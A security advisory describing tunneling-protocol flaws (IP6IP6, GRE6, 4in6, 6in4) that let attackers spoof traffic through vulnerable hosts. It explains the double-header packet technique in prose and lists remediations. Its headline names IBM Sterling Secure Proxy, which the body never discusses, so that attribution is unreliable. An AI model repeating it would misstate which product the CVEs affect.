IBM Sterling Secure Proxy Vulnerabilities Expose Systems to High-Risk Exploits
January 21, 2025IBM Sterling Secure Proxy Vulnerabilities Expose Systems to High-Risk Exploits
January 21, 2025Severity
High
Analysis Summary
Recent research has revealed critical vulnerabilities in multiple tunneling protocols that expose millions of internet hosts to potential cyberattacks. These protocols, including IP6IP6, GRE6, 4in6, and 6in4, are primarily used to connect disjointed networks but lack sufficient authentication and encryption safeguards when not paired with protocols like IPSec.
According to the Researcher, assigned CVE identifiers such as CVE-2024-7595 and CVE-2025-23018, allow attackers to inject malicious traffic into tunnels or spoof source IP addresses, enabling activities like (DDoS) attacks and unauthorized access to private networks. A staggering 4.2 million hosts are affected, with China, France, Japan, the U.S., and Brazil topping the list of impacted regions.
The exploitation process involves sending a specially crafted packet with two IP headers. The outer header bears the attacker’s source IP and the vulnerable host's destination IP, while the inner header mimics the vulnerable host as the source. Upon receiving the malicious packet, the vulnerable host strips the outer header and forwards the inner packet making it appear as though the malicious traffic originates from the trusted host. This technique bypasses network filters, enabling attackers to use compromised systems as one-way proxies or to conduct anonymous attacks.
The repercussions of these attacks are significant, including network congestion, service disruption, and even device crash due to resource overload. Additionally, attackers could exploit these vulnerabilities to intercept data or perform man-in-the-middle attacks. Content delivery network (CDN) nodes, ISP home routers, mobile network gateways, VPN servers, and core internet routers are particularly at risk, emphasizing the widespread impact on both individual and organizational networks.
To mitigate these threats, it is crucial to implement robust defenses such as using IPSec or WireGuard for authentication and encryption and restricting tunneling packets to trusted sources. Network-level defenses should include traffic filtering, deep packet inspection (DPI), and blocking unencrypted tunneling packets. Without these measures, vulnerable systems remain at risk of becoming unwitting participants in larger cyberattacks, amplifying their impact on global internet infrastructure.
Impact
- DDoS
- Unauthorized Access
- Data Manipulate
Remediation
- Implement IPSec or WireGuard to ensure authentication and encryption of tunneling traffic.
- Only accept tunneling packets from trusted and verified sources.
- Configure routers and middleboxes to block untrusted or unencrypted tunneling packets.
- Use Access Control Lists (ACLs) to restrict access to critical systems.
- Perform thorough analysis of network traffic to identify and block malicious tunneling packets.
- Regularly apply security patches and updates to routers, VPN servers, and other network devices to mitigate known vulnerabilities.
- Isolate sensitive systems and private networks to limit the spread of an attack.
- Use intrusion detection systems (IDS) or intrusion prevention systems (IPS) to identify suspicious tunneling activities.
- Train network administrators to recognize and respond to tunneling-related threats effectively.
- Work with internet service providers to identify and filter malicious traffic at the ISP level.
- Disable unnecessary tunneling protocols and services on network devices.